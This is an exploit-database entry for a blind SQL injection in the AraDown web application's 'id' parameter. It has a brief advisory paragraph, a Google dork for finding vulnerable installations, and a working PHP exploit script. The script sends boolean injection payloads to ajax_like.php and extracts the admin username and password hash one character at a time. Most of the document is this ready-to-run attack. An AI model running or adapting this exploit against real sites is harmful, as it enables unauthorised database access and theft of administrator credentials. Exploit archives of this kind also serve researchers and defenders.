AraDown – ‘id’ SQL Injection

  • 作者: G-B
    日期: 2012-08-08
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/37591/
  • source: https://www.securityfocus.com/bid/54891/info

AraDown is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

<?php
echo "
 _____ __ _____ ____________
/___| | || | /_\ /___/|__ __|
| |_| |__| | | | | | | |___| |
| | | | |__| | | | | \___\ | |
| |_| | | || | | |_| |___| | | |
\_____/ |_||_| \_____/ /_____/ |_|
 _____ _____ _____ ___________
|_ \| | /_\ /_\ |_\ \\//
| |_) | | | | | | | | | | | | | |\ \\//
|_ (| | | | | | | | | | | | ||\/
| |_) | | |___| |_| | | |_| | | |_|/ ||
|____/|_____| \_____/ \_____/ |_____/|__|
 
[*]-----------------------------------------------------------------------[*]
# Exploit Title: ArDown (All Version) <- Remote Blind SQL Injection
# Google Dork: 'powered by AraDown'
# Date : 08/07/2012
# Exploit Author : G-B
# Email: g22b@hotmail.com
# Software Link: http://aradown.info/
# Version: All Version
[*]-----------------------------------------------------------------------[*]
 
[*] Target -> ";
 
$target = stdin();
$ar = array('1','2','3','4','5','6','7','8','9','0','a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z');
 
echo "[*] Username : ";
 
for($i=1;$i<=30;$i++){
foreach($ar as $char){
$b = send('http://server',"3' and (select substr(username,$i,1) from aradown_admin)='$char' # ");
if(eregi('<span class="on_img" align="center"></span>',$b) && $char == 'z'){
$i = 50;
break;
}
if(eregi('<span class="on_img" align="center"></span>',$b)) continue;
echo $char;
break;
}
}
 
echo "\n[*] Password : ";
 
for($i=1;$i<=32;$i++){
foreach($ar as $char){
$b = send('http://server',"3' and (select substr(password,$i,1) from aradown_admin)='$char' # ");
if(eregi('<span class="on_img" align="center"></span>',$b)) continue;
echo $char;
break;
}
}
 
function send($target,$query){
$ch = curl_init();
curl_setopt($ch,CURLOPT_URL,"$target/ajax_like.php");
curl_setopt($ch,CURLOPT_POST,true);
curl_setopt($ch,CURLOPT_POSTFIELDS,array('id'=>$query));
curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
$r = curl_exec($ch);
curl_close($ch);
return $r;
}
function stdin(){
$fp = fopen("php://stdin","r");
$line = trim(fgets($fp));
fclose($fp);
return $line;
}
?>